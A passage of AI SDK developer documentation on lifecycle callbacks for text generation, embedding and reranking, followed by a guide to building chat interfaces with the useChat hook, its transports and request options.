Array | undefined', description: 'Condition(s) for stopping the generation.', }, { name: 'output', type: 'Output | undefined', description: 'The output specification for structured outputs.', }, { name: 'abortSignal', type: 'AbortSignal | undefined', description: 'Abort signal for cancelling the operation.', }, { name: 'include', type: '{ requestBody?: boolean; responseBody?: boolean } | undefined', description: 'Settings for controlling what data is included in step results.', }, { name: 'functionId', type: 'string | undefined', description: 'Identifier from telemetry settings for grouping related operations.', }, { name: 'runtimeContext', type: 'CONTEXT', description: 'User-defined shared runtime context object. May be updated from prepareStep between steps.', }, { name: 'toolsContext', type: 'InferToolSetContext', description: 'Per-tool context map. May be updated from prepareStep between steps.', }, ]} />
experimental_onToolExecutionStart
Called before a tool's execute function runs.
const result = await generateText({
model: openai('gpt-4o'),
prompt: 'What is the weather?',
tools: { getWeather },
experimental_onToolExecutionStart: event => {
console.log('Tool:', event.toolCall.toolName);
console.log('Input:', event.toolCall.input);
},
});
<PropertiesTable content={[ { name: 'stepNumber', type: 'number | undefined', description: 'Zero-based index of the current step where this tool call occurs.', }, { name: 'model', type: '{ provider: string; modelId: string } | undefined', description: 'The model being used for this step.', }, { name: 'toolCall', type: 'TypedToolCall', description: 'The full tool call object.', properties: [ { type: 'TypedToolCall', parameters: [ { name: 'type', type: "'tool-call'", description: 'The type of the call.', }, { name: 'toolCallId', type: 'string', description: 'Unique identifier for this tool call.', }, { name: 'toolName', type: 'string', description: 'Name of the tool being called.', }, { name: 'input', type: 'unknown', description: 'Input arguments passed to the tool.', }, ], }, ], }, { name: 'messages', type: 'Array', description: 'The conversation messages available at tool execution time.', }, { name: 'abortSignal', type: 'AbortSignal | undefined', description: 'Signal for cancelling the operation.', }, { name: 'functionId', type: 'string | undefined', description: 'Identifier from telemetry settings for grouping related operations.', }, { name: 'context', type: 'CONTEXT', description: 'Tool-specific context object for the tool call that is about to execute.', }, ]} />
experimental_onToolExecutionEnd
Called after a tool's execute function completes or errors. Uses a discriminated union on the success field.
const result = await generateText({
model: openai('gpt-4o'),
prompt: 'What is the weather?',
tools: { getWeather },
experimental_onToolExecutionEnd: event => {
console.log('Tool:', event.toolCall.toolName);
console.log('Duration:', event.durationMs, 'ms');
if (event.success) {
console.log('Output:', event.output);
} else {
console.error('Error:', event.error);
}
},
});
<PropertiesTable content={[ { name: 'stepNumber', type: 'number | undefined', description: 'Zero-based index of the current step where this tool call occurred.', }, { name: 'model', type: '{ provider: string; modelId: string } | undefined', description: 'The model being used for this step.', }, { name: 'toolCall', type: 'TypedToolCall', description: 'The full tool call object.', properties: [ { type: 'TypedToolCall', parameters: [ { name: 'type', type: "'tool-call'", description: 'The type of the call.', }, { name: 'toolCallId', type: 'string', description: 'Unique identifier for this tool call.', }, { name: 'toolName', type: 'string', description: 'Name of the tool that was called.', }, { name: 'input', type: 'unknown', description: 'Input arguments passed to the tool.', }, ], }, ], }, { name: 'messages', type: 'Array', description: 'The conversation messages available at tool execution time.', }, { name: 'abortSignal', type: 'AbortSignal | undefined', description: 'Signal for cancelling the operation.', }, { name: 'durationMs', type: 'number', description: 'Execution time of the tool call in milliseconds.', }, { name: 'functionId', type: 'string | undefined', description: 'Identifier from telemetry settings for grouping related operations.', }, { name: 'context', type: 'CONTEXT', description: 'Tool-specific context object for the tool call that just completed.', }, { name: 'success', type: 'boolean', description: 'Discriminator indicating whether the tool call succeeded. When true, output is available. When false, error is available.', }, { name: 'output', type: 'unknown', description: "The tool's return value (only present when success is true).", }, { name: 'error', type: 'unknown', description: 'The error that occurred during tool execution (only present when success is false).', }, ]} />
onStepFinish
Called after each step (LLM call) completes. Provides the full StepResult.
const result = await generateText({
model: openai('gpt-4o'),
prompt: 'Hello!',
onStepFinish: event => {
console.log('Step:', event.stepNumber);
console.log('Finish reason:', event.finishReason);
console.log('Tokens:', event.usage.totalTokens);
},
});
<PropertiesTable content={[ { name: 'stepNumber', type: 'number', description: 'Zero-based index of this step.', }, { name: 'model', type: '{ provider: string; modelId: string }', description: 'Information about the model that produced this step.', }, { name: 'finishReason', type: "'stop' | 'length' | 'content-filter' | 'tool-calls' | 'error' | 'other'", description: 'The unified reason why the generation finished.', }, { name: 'usage', type: 'LanguageModelUsage', description: 'The token usage of the generated text.', properties: [ { type: 'LanguageModelUsage', parameters: [ { name: 'inputTokens', type: 'number | undefined', description: 'The total number of input (prompt) tokens used.', }, { name: 'outputTokens', type: 'number | undefined', description: 'The number of output (completion) tokens used.', }, { name: 'totalTokens', type: 'number | undefined', description: 'The total number of tokens used.', }, ], }, ], }, { name: 'text', type: 'string', description: 'The generated text.', }, { name: 'toolCalls', type: 'Array', description: 'The tool calls that were made during the generation.', }, { name: 'toolResults', type: 'Array', description: 'The results of the tool calls.', }, { name: 'content', type: 'Array', description: 'The content that was generated in this step.', }, { name: 'reasoning', type: 'Array<ReasoningPart | ReasoningFilePart>', description: 'The reasoning that was generated during the generation.', }, { name: 'reasoningText', type: 'string | undefined', description: 'The reasoning text that was generated.', }, { name: 'files', type: 'Array', description: 'The files that were generated during the generation.', }, { name: 'sources', type: 'Array', description: 'The sources that were used to generate the text.', }, { name: 'warnings', type: 'CallWarning[] | undefined', description: 'Warnings from the model provider.', }, { name: 'request', type: 'LanguageModelRequestMetadata', description: 'Additional request information.', }, { name: 'response', type: 'LanguageModelResponseMetadata', description: 'Additional response information including id, modelId, timestamp, headers, and messages.', }, { name: 'functionId', type: 'string | undefined', description: 'Identifier from telemetry settings for grouping related operations.', }, { name: 'runtimeContext', type: 'CONTEXT', description: 'User-defined shared runtime context object flowing through the generation.', }, { name: 'toolsContext', type: 'InferToolSetContext', description: 'Per-tool context map for the generation step.', }, { name: 'providerMetadata', type: 'ProviderMetadata | undefined', description: 'Additional provider-specific metadata.', }, ]} />
onFinish
Called when the entire generation completes (all steps finished). Includes aggregated data.
const result = await generateText({
model: openai('gpt-4o'),
prompt: 'Hello!',
onFinish: event => {
console.log('Total steps:', event.steps.length);
console.log('Total tokens:', event.totalUsage.totalTokens);
console.log('Final text:', event.text);
},
});
<PropertiesTable
content={[
{
name: 'steps',
type: 'Array',
description: 'Array containing results from all steps in the generation.',
},
{
name: 'totalUsage',
type: 'LanguageModelUsage',
description: 'Aggregated token usage across all steps.',
properties: [
{
type: 'LanguageModelUsage',
parameters: [
{
name: 'inputTokens',
type: 'number | undefined',
description:
'The total number of input tokens used across all steps.',
},
{
name: 'outputTokens',
type: 'number | undefined',
description:
'The total number of output tokens used across all steps.',
},
{
name: 'totalTokens',
type: 'number | undefined',
description: 'The total number of tokens used across all steps.',
},
],
},
],
},
{
name: 'stepNumber',
type: 'number',
description: 'Zero-based index of the final step.',
},
{
name: 'model',
type: '{ provider: string; modelId: string }',
description: 'Information about the model that produced the final step.',
},
{
name: 'finishReason',
type: "'stop' | 'length' | 'content-filter' | 'tool-calls' | 'error' | 'other'",
description: 'The unified reason why the generation finished.',
},
{
name: 'usage',
type: 'LanguageModelUsage',
description: 'The token usage from the final step only (not aggregated).',
},
{
name: 'text',
type: 'string',
description: 'The full text that has been generated.',
},
{
name: 'toolCalls',
type: 'Array',
description: 'The tool calls that were made in the final step.',
},
{
name: 'toolResults',
type: 'Array',
description: 'The results of the tool calls from the final step.',
},
{
name: 'content',
type: 'Array',
description: 'The content that was generated in the final step.',
},
{
name: 'reasoning',
type: 'Array<ReasoningPart | ReasoningFilePart>',
description: 'The reasoning that was generated.',
},
{
name: 'reasoningText',
type: 'string | undefined',
description: 'The reasoning text that was generated.',
},
{
name: 'files',
type: 'Array',
description: 'Files that were generated in the final step.',
},
{
name: 'sources',
type: 'Array',
description:
'Sources that have been used as input to generate the response.',
},
{
name: 'warnings',
type: 'CallWarning[] | undefined',
description: 'Warnings from the model provider.',
},
{
name: 'request',
type: 'LanguageModelRequestMetadata',
description: 'Additional request information from the final step.',
},
{
name: 'response',
type: 'LanguageModelResponseMetadata',
description: 'Additional response information from the final step.',
},
{
name: 'functionId',
type: 'string | undefined',
description:
'Identifier from telemetry settings for grouping related operations.',
},
{
name: 'runtimeContext',
type: 'CONTEXT',
description:
'The final state of the user-defined shared runtime context object.',
},
{
name: 'toolsContext',
type: 'InferToolSetContext',
description:
'The final state of the per-tool context map passed via toolsContext.',
},
{
name: 'providerMetadata',
type: 'ProviderMetadata | undefined',
description: 'Additional provider-specific metadata from the final step.',
},
]}
/>
embed / embedMany
experimental_onStart
Called when the embedding operation begins, before the embedding model is called. Both embed and embedMany share the same event interface; the operationId field distinguishes them ('ai.embed' vs 'ai.embedMany'), and the value field is a single string for embed or an array of strings for embedMany.
import { embed } from 'ai';
const result = await embed({
model: openai.embedding('text-embedding-3-small'),
value: 'sunny day at the beach',
experimental_onStart: event => {
console.log('Operation:', event.operationId);
console.log('Model:', event.model.modelId);
},
});
<PropertiesTable content={[ { name: 'callId', type: 'string', description: 'Unique identifier for this embed call.', }, { name: 'operationId', type: 'string', description: "Identifies the operation type ('ai.embed' or 'ai.embedMany').", }, { name: 'model', type: '{ provider: string; modelId: string }', description: 'The embedding model being used.', }, { name: 'value', type: 'string | Array', description: 'The value(s) being embedded. A single string for embed, or an array for embedMany.', }, { name: 'maxRetries', type: 'number', description: 'Maximum number of retries for failed requests.', }, { name: 'abortSignal', type: 'AbortSignal | undefined', description: 'Abort signal for cancelling the operation.', }, { name: 'headers', type: 'Record<string, string | undefined> | undefined', description: 'Additional HTTP headers sent with the request.', }, { name: 'providerOptions', type: 'ProviderOptions | undefined', description: 'Additional provider-specific options.', }, { name: 'functionId', type: 'string | undefined', description: 'Identifier from telemetry settings for grouping related operations.', }, ]} />
experimental_onFinish
Called when the embedding operation completes. For embed, embedding is a single vector and response is a single response object. For embedMany, embedding is an array of vectors and response is an array of response objects (one per chunk).
import { embedMany } from 'ai';
const result = await embedMany({
model: openai.embedding('text-embedding-3-small'),
values: ['sunny day at the beach', 'rainy afternoon in the city'],
experimental_onFinish: event => {
console.log('Operation:', event.operationId);
console.log('Usage:', event.usage);
},
});
<PropertiesTable content={[ { name: 'callId', type: 'string', description: 'Unique identifier for this embed call.', }, { name: 'operationId', type: 'string', description: "Identifies the operation type ('ai.embed' or 'ai.embedMany').", }, { name: 'model', type: '{ provider: string; modelId: string }', description: 'The embedding model that was used.', }, { name: 'value', type: 'string | Array', description: 'The value(s) that were embedded.', }, { name: 'embedding', type: 'Embedding | Array', description: 'The resulting embedding(s). A single vector for embed, or an array for embedMany.', }, { name: 'usage', type: 'EmbeddingModelUsage', description: 'Token usage for the embedding operation.', }, { name: 'warnings', type: 'Array', description: 'Warnings from the embedding model.', }, { name: 'providerMetadata', type: 'ProviderMetadata | undefined', description: 'Optional provider-specific metadata.', }, { name: 'response', type: '{ headers?: Record<string, string>; body?: unknown } | Array<{ headers?: Record<string, string>; body?: unknown } | undefined> | undefined', description: 'Response data. A single response for embed, or an array for embedMany (one per chunk).', }, { name: 'functionId', type: 'string | undefined', description: 'Identifier from telemetry settings for grouping related operations.', }, ]} />
rerank
experimental_onStart
Called when the reranking operation begins, before the reranking model is called.
import { rerank } from 'ai';
const result = await rerank({
model: cohere.reranking('rerank-v3.5'),
documents: ['sunny day at the beach', 'rainy afternoon in the city'],
query: 'talk about rain',
experimental_onStart: event => {
console.log('Operation:', event.operationId);
console.log('Model:', event.model.modelId);
},
});
<PropertiesTable content={[ { name: 'callId', type: 'string', description: 'Unique identifier for this rerank call.', }, { name: 'operationId', type: 'string', description: "Identifies the operation type ('ai.rerank').", }, { name: 'model', type: '{ provider: string; modelId: string }', description: 'The reranking model being used.', }, { name: 'documents', type: 'Array<JSONObject | string>', description: 'The documents being reranked.', }, { name: 'query', type: 'string', description: 'The query to rerank the documents against.', }, { name: 'topN', type: 'number | undefined', description: 'Number of top documents to return.', }, { name: 'maxRetries', type: 'number', description: 'Maximum number of retries for failed requests.', }, { name: 'abortSignal', type: 'AbortSignal | undefined', description: 'Abort signal for cancelling the operation.', }, { name: 'headers', type: 'Record<string, string | undefined> | undefined', description: 'Additional HTTP headers sent with the request.', }, { name: 'providerOptions', type: 'ProviderOptions | undefined', description: 'Additional provider-specific options.', }, { name: 'functionId', type: 'string | undefined', description: 'Identifier from telemetry settings for grouping related operations.', }, ]} />
experimental_onFinish
Called when the reranking operation completes, after the reranking model returns.
import { rerank } from 'ai';
const result = await rerank({
model: cohere.reranking('rerank-v3.5'),
documents: ['sunny day at the beach', 'rainy afternoon in the city'],
query: 'talk about rain',
experimental_onFinish: event => {
console.log('Operation:', event.operationId);
console.log('Rankings:', event.ranking.length);
},
});
<PropertiesTable content={[ { name: 'callId', type: 'string', description: 'Unique identifier for this rerank call.', }, { name: 'operationId', type: 'string', description: "Identifies the operation type ('ai.rerank').", }, { name: 'model', type: '{ provider: string; modelId: string }', description: 'The reranking model that was used.', }, { name: 'documents', type: 'Array<JSONObject | string>', description: 'The documents that were reranked.', }, { name: 'query', type: 'string', description: 'The query that documents were reranked against.', }, { name: 'ranking', type: 'Array<{ originalIndex: number; score: number; document: JSONObject | string }>', description: 'The reranked results sorted by relevance score in descending order.', }, { name: 'warnings', type: 'Array', description: 'Warnings from the reranking model.', }, { name: 'providerMetadata', type: 'ProviderMetadata | undefined', description: 'Optional provider-specific metadata.', }, { name: 'response', type: '{ id?: string; timestamp: Date; modelId: string; headers?: Record<string, string>; body?: unknown }', description: 'Response data including headers and body.', }, { name: 'functionId', type: 'string | undefined', description: 'Identifier from telemetry settings for grouping related operations.', }, ]} />
Use Cases
Logging and Debugging
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-4o'),
prompt: 'Hello!',
experimental_onStart: event => {
console.log(`[${new Date().toISOString()}] Generation started`, {
model: event.model.modelId,
provider: event.model.provider,
});
},
onStepFinish: event => {
console.log(
`[${new Date().toISOString()}] Step ${event.stepNumber} finished`,
{
finishReason: event.finishReason,
tokens: event.usage.totalTokens,
},
);
},
onFinish: event => {
console.log(`[${new Date().toISOString()}] Generation complete`, {
totalSteps: event.steps.length,
totalTokens: event.totalUsage.totalTokens,
});
},
});
Tool Execution Monitoring
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-4o'),
prompt: 'What is the weather?',
tools: { getWeather },
experimental_onToolExecutionStart: event => {
console.log(`Tool "${event.toolCall.toolName}" starting...`);
},
experimental_onToolExecutionEnd: event => {
if (event.success) {
console.log(
`Tool "${event.toolCall.toolName}" completed in ${event.durationMs}ms`,
);
} else {
console.error(`Tool "${event.toolCall.toolName}" failed:`, event.error);
}
},
});
Embedding Observability
import { embedMany } from 'ai';
const result = await embedMany({
model: openai.embedding('text-embedding-3-small'),
values: ['sunny day at the beach', 'rainy afternoon in the city'],
experimental_onStart: event => {
console.log(`Embedding started (${event.operationId})`, {
model: event.model.modelId,
valueCount: Array.isArray(event.value) ? event.value.length : 1,
});
},
experimental_onFinish: event => {
console.log(`Embedding complete (${event.operationId})`, {
tokens: event.usage.tokens,
});
},
});
Error Handling
Errors thrown inside callbacks are caught and do not break the generation, embedding, or reranking flow. This ensures that monitoring code cannot disrupt your application:
const result = await generateText({
model: openai('gpt-4o'),
prompt: 'Hello!',
experimental_onStart: () => {
throw new Error('This error is caught internally');
// Generation continues normally
},
});
title: Overview description: An overview of AI SDK UI.
AI SDK UI
AI SDK UI is designed to help you build interactive chat, completion, and assistant applications with ease. It is a framework-agnostic toolkit, streamlining the integration of advanced AI functionalities into your applications.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently. With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
- useChat offers real-time streaming of chat messages, abstracting state management for inputs, messages, loading, and errors, allowing for seamless integration into any UI design.
- useCompletion enables you to handle text completions in your applications, managing the prompt input and automatically updating the UI as new completions are streamed.
- useObject is a hook that allows you to consume streamed JSON objects, providing a simple way to handle and display structured data in your application.
These hooks are designed to reduce the complexity and time required to implement AI interactions, letting you focus on creating exceptional user experiences.
UI Framework Support
AI SDK UI supports the following frameworks: React, Svelte, Vue.js, Angular, and SolidJS.
Here is a comparison of the supported functions across these frameworks:
| Framework | useChat | useCompletion | useObject |
|---|---|---|---|
| React (@ai-sdk/react) | ✓ | ✓ | ✓ |
| Vue.js (@ai-sdk/vue) | ✓ | ✓ | ✓ |
| Svelte (@ai-sdk/svelte) | Chat | Completion | StructuredObject |
| Angular (@ai-sdk/angular) | Chat | Completion | StructuredObject |
| SolidJS (community) | | | |
Framework Examples
Explore these example implementations for different frameworks:
API Reference
Please check out the AI SDK UI API Reference for more details on each function.
title: Chatbot description: Learn how to use the useChat hook.
Chatbot
The useChat hook makes it effortless to create a conversational user interface for your chatbot application. It enables the streaming of chat messages from your AI provider, manages the chat state, and updates the UI automatically as new messages arrive.
To summarize, the useChat hook provides the following features:
- Message Streaming: All the messages from the AI provider are streamed to the chat UI in real-time.
- Managed States: The hook manages the state for input, messages, status, error, and more for you.
- Seamless Integration: Easily integrate your chat AI into any design or layout with minimal effort.
In this guide, you will learn how to use the useChat hook to create a chatbot application with real-time message streaming.
Check out our chatbot with tools guide to learn how to use tools in your chatbot.
Let's start with the following example.
Example
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';
export default function Page() {
const { messages, sendMessage, status } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
});
const [input, setInput] = useState('');
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) =>
part.type === 'text' ? <span key={index}>{part.text}</span> : null,
)}
</div>
))}
<form
onSubmit={e => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
}}
>
<input
value={input}
onChange={e => setInput(e.target.value)}
disabled={status !== 'ready'}
placeholder="Say something..."
/>
<button type="submit" disabled={status !== 'ready'}>
Submit
</button>
</form>
</>
);
}
import { convertToModelMessages, streamText, UIMessage } from 'ai';
__PROVIDER_IMPORT__;
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: __MODEL__,
system: 'You are a helpful assistant.',
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
In the Page component, the useChat hook sends a request to your AI provider endpoint whenever the user submits a message using sendMessage.
The messages are then streamed back in real-time and displayed in the chat UI.
This enables a seamless chat experience where the user can see the AI response as soon as it is available, without having to wait for the entire response to be received.
Customized UI
useChat also provides ways to manage chat message state programmatically, show the current status, and update messages without user interaction.
Status
The useChat hook returns a status. It has the following possible values:
- submitted: The message has been sent to the API and we're awaiting the start of the response stream.
- streaming: The response is actively streaming in from the API, receiving chunks of data.
- ready: The full response has been received and processed; a new user message can be submitted.
- error: An error occurred during the API request, preventing successful completion.
You can use status for the following purposes:
- To show a loading spinner while the chatbot is processing the user's message.
- To show a "Stop" button to abort the current message.
- To disable the submit button.
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';
export default function Page() {
const { messages, sendMessage, status, stop } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
});
const [input, setInput] = useState('');
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) =>
part.type === 'text' ? <span key={index}>{part.text}</span> : null,
)}
</div>
))}
{(status === 'submitted' || status === 'streaming') && (
<div>
{status === 'submitted' && <Spinner />}
<button type="button" onClick={() => stop()}>
Stop
</button>
</div>
)}
<form
onSubmit={e => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
}}
>
<input
value={input}
onChange={e => setInput(e.target.value)}
disabled={status !== 'ready'}
placeholder="Say something..."
/>
<button type="submit" disabled={status !== 'ready'}>
Submit
</button>
</form>
</>
);
}
Error State
Similarly, the error state reflects the error object thrown during the fetch request.
It can be used to display an error message, disable the submit button, or show a retry button:
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';
export default function Chat() {
const { messages, sendMessage, error, regenerate } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
});
const [input, setInput] = useState('');
return (
<div>
{messages.map(m => (
<div key={m.id}>
{m.role}:{' '}
{m.parts.map((part, index) =>
part.type === 'text' ? <span key={index}>{part.text}</span> : null,
)}
</div>
))}
{error && (
<>
<div>An error occurred.</div>
<button type="button" onClick={() => regenerate()}>
Retry
</button>
</>
)}
<form
onSubmit={e => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
}}
>
<input
value={input}
onChange={e => setInput(e.target.value)}
disabled={error != null}
/>
</form>
</div>
);
}
Please also see the error handling guide for more information.
Modify messages
Sometimes, you may want to directly modify some existing messages. For example, a delete button can be added to each message to allow users to remove them from the chat history.
The setMessages function can help you achieve these tasks:
const { messages, setMessages } = useChat()
const handleDelete = (id) => {
setMessages(messages.filter(message => message.id !== id))
}
return <>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) => (
part.type === 'text' ? (
<span key={index}>{part.text}</span>
) : null
))}
<button onClick={() => handleDelete(message.id)}>Delete</button>
</div>
))}
...
You can think of messages and setMessages as a pair of state and setState in React.
Cancellation and regeneration
It's also a common use case to abort the response message while it's still streaming back from the AI provider. You can do this by calling the stop function returned by the useChat hook.
const { stop, status } = useChat()
return <>
<button onClick={stop} disabled={!(status === 'streaming' || status === 'submitted')}>Stop</button>
...
When the user clicks the "Stop" button, the fetch request will be aborted. This avoids consuming unnecessary resources and improves the UX of your chatbot application.
Similarly, you can also request the AI provider to reprocess the last message by calling the regenerate function returned by the useChat hook:
const { regenerate, status } = useChat();
return (
<>
<button
onClick={regenerate}
disabled={!(status === 'ready' || status === 'error')}
>
Regenerate
</button>
...
</>
);
When the user clicks the "Regenerate" button, the AI provider will regenerate the last message and replace the current one correspondingly.
Throttling UI Updates
This feature is currently only available for React.
By default, the useChat hook will trigger a render every time a new chunk is received.
You can throttle the UI updates with the experimental_throttle option.
const { messages, ... } = useChat({
// Throttle the messages and data updates to 50ms:
experimental_throttle: 50
})
Event Callbacks
useChat provides optional event callbacks that you can use to handle different stages of the chatbot lifecycle:
- onFinish: Called when the assistant response is completed. The event includes the response message, all messages, and flags for abort, disconnect, and errors.
- onError: Called when an error occurs during the fetch request.
- onData: Called whenever a data part is received.
These callbacks can be used to trigger additional actions, such as logging, analytics, or custom UI updates.
import { UIMessage } from 'ai';
const {
/* ... */
} = useChat({
onFinish: ({ message, messages, isAbort, isDisconnect, isError }) => {
// use information to e.g. update other UI states
},
onError: error => {
console.error('An error occurred:', error);
},
onData: data => {
console.log('Received data part from server:', data);
},
});
It's worth noting that you can abort the processing by throwing an error in the onData callback. This will trigger the onError callback and stop the message from being appended to the chat UI. This can be useful for handling unexpected responses from the AI provider.
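A minimal sketch of this pattern (the data part type checked here is hypothetical):
const { messages } = useChat({
onData: data => {
// Hypothetical guard: reject a data part the client does not expect
if (data.type === 'data-unexpected') {
throw new Error('Unexpected data part received');
}
},
onError: error => {
// The throw above surfaces here, and the message is not appended to the chat UI
console.error(error);
},
});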
Request Configuration
Custom headers, body, and credentials
By default, the useChat hook sends an HTTP POST request to the /api/chat endpoint with the message list as the request body. You can customize the request in two ways:
Hook-Level Configuration (Applied to all requests)
You can configure transport-level options that will be applied to all requests made by the hook:
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({
api: '/api/custom-chat',
headers: {
Authorization: 'your_token',
},
body: {
user_id: '123',
},
credentials: 'same-origin',
}),
});
Dynamic Hook-Level Configuration
You can also provide functions that return configuration values. This is useful for authentication tokens that need to be refreshed, or for configuration that depends on runtime conditions:
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({
api: '/api/custom-chat',
headers: () => ({
Authorization: `Bearer ${getAuthToken()}`,
'X-User-ID': getCurrentUserId(),
}),
body: () => ({
sessionId: getCurrentSessionId(),
preferences: getUserPreferences(),
}),
credentials: () => 'include',
}),
});
Request-Level Configuration (Recommended)
// Pass options as the second parameter to sendMessage
sendMessage(
{ text: input },
{
headers: {
Authorization: 'Bearer token123',
'X-Custom-Header': 'custom-value',
},
body: {
temperature: 0.7,
max_tokens: 100,
user_id: '123',
},
metadata: {
userId: 'user123',
sessionId: 'session456',
},
},
);
The request-level options are merged with hook-level options, with request-level options taking precedence. On your server side, you can handle the request with this additional information.
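As a minimal server-side sketch, a route could read the merged fields from the request-level example above (how the fields are used here is illustrative):
import { convertToModelMessages, streamText, UIMessage } from 'ai';
export async function POST(req: Request) {
// Request-level fields arrive in the body alongside the messages
const {
messages,
temperature,
user_id,
}: { messages: UIMessage[]; temperature?: number; user_id?: string } =
await req.json();
// user_id could be used for logging or rate limiting (illustrative)
const result = streamText({
model: __MODEL__,
temperature, // forward the per-request setting (illustrative)
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}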
Setting custom body fields per request
You can configure custom body fields on a per-request basis using the second parameter of the sendMessage function.
This is useful if you want to pass in additional information to your backend that is not part of the message list.
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Chat() {
const { messages, sendMessage } = useChat();
const [input, setInput] = useState('');
return (
<div>
{messages.map(m => (
<div key={m.id}>
{m.role}:{' '}
{m.parts.map((part, index) =>
part.type === 'text' ? <span key={index}>{part.text}</span> : null,
)}
</div>
))}
<form
onSubmit={event => {
event.preventDefault();
if (input.trim()) {
sendMessage(
{ text: input },
{
body: {
customKey: 'customValue',
},
},
);
setInput('');
}
}}
>
<input value={input} onChange={e => setInput(e.target.value)} />
</form>
</div>
);
}
You can retrieve these custom fields on your server side by destructuring the request body:
export async function POST(req: Request) {
// Extract additional information ("customKey") from the body of the request:
const { messages, customKey }: { messages: UIMessage[]; customKey: string } =
await req.json();
//...
}
Message Metadata
You can attach custom metadata to messages for tracking information like timestamps, model details, and token usage.
// Server: Send metadata about the message
return result.toUIMessageStreamResponse({
messageMetadata: ({ part }) => {
if (part.type === 'start') {
return {
createdAt: Date.now(),
model: 'gpt-5.1',
};
}
if (part.type === 'finish') {
return {
totalTokens: part.totalUsage.totalTokens,
};
}
},
});
// Client: Access metadata via message.metadata
{
messages.map(message => (
<div key={message.id}>
{message.role}:{' '}
{message.metadata?.createdAt &&
new Date(message.metadata.createdAt).toLocaleTimeString()}
{/* Render message content */}
{message.parts.map((part, index) =>
part.type === 'text' ? <span key={index}>{part.text}</span> : null,
)}
{/* Show token count if available */}
{message.metadata?.totalTokens && (
<span>{message.metadata.totalTokens} tokens</span>
)}
</div>
));
}
For complete examples with type safety and advanced use cases, see the Message Metadata documentation.
Transport Configuration
You can configure custom transport behavior using the transport option to customize how messages are sent to your API:
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
export default function Chat() {
const { messages, sendMessage } = useChat({
id: 'my-chat',
transport: new DefaultChatTransport({
prepareSendMessagesRequest: ({ id, messages }) => {
return {
body: {
id,
message: messages[messages.length - 1],
},
};
},
}),
});
// ... rest of your component
}
The corresponding API route receives the custom request format:
export async function POST(req: Request) {
const { id, message } = await req.json();
// Load existing messages and add the new one
const messages = await loadMessages(id);
messages.push(message);
const result = streamText({
model: __MODEL__,
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
Advanced: Trigger-based routing
For more complex scenarios like message regeneration, you can use trigger-based routing:
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
export default function Chat() {
const { messages, sendMessage, regenerate } = useChat({
id: 'my-chat',
transport: new DefaultChatTransport({
prepareSendMessagesRequest: ({ id, messages, trigger, messageId }) => {
if (trigger === 'submit-user-message') {
return {
body: {
trigger: 'submit-user-message',
id,
message: messages[messages.length - 1],
messageId,
},
};
} else if (trigger === 'regenerate-assistant-message') {
return {
body: {
trigger: 'regenerate-assistant-message',
id,
messageId,
},
};
}
throw new Error(`Unsupported trigger: ${trigger}`);
},
}),
});
// ... rest of your component
}
The corresponding API route would handle different triggers:
export async function POST(req: Request) {
const { trigger, id, message, messageId } = await req.json();
const chat = await readChat(id);
let messages = chat.messages;
if (trigger === 'submit-user-message') {
// Handle new user message
messages = [...messages, message];
} else if (trigger === 'regenerate-assistant-message') {
// Handle message regeneration - remove messages after messageId
const messageIndex = messages.findIndex(m => m.id === messageId);
if (messageIndex !== -1) {
messages = messages.slice(0, messageIndex);
}
}
const result = streamText({
model: __MODEL__,
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
To learn more about building custom transports, refer to the Transport API documentation.
Direct Agent Transport
For scenarios where you want to communicate directly with an Agent without going through HTTP, you can use DirectChatTransport. This is useful for:
- Server-side rendering scenarios
- Testing without network
- Single-process applications
import { useChat } from '@ai-sdk/react';
import { DirectChatTransport, ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: __MODEL__,
instructions: 'You are a helpful assistant.',
});
export default function Chat() {
const { messages, sendMessage, status } = useChat({
transport: new DirectChatTransport({ agent }),
});
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) =>
part.type === 'text' ? <span key={index}>{part.text}</span> : null,
)}
</div>
))}
<button
onClick={() => sendMessage({ text: 'Hello!' })}
disabled={status !== 'ready'}
>
Send
</button>
</>
);
}
The DirectChatTransport invokes the agent's stream() method directly, converting UI messages to model messages and streaming the response back as UI message chunks.
For more details, see the DirectChatTransport reference.
Controlling the response stream
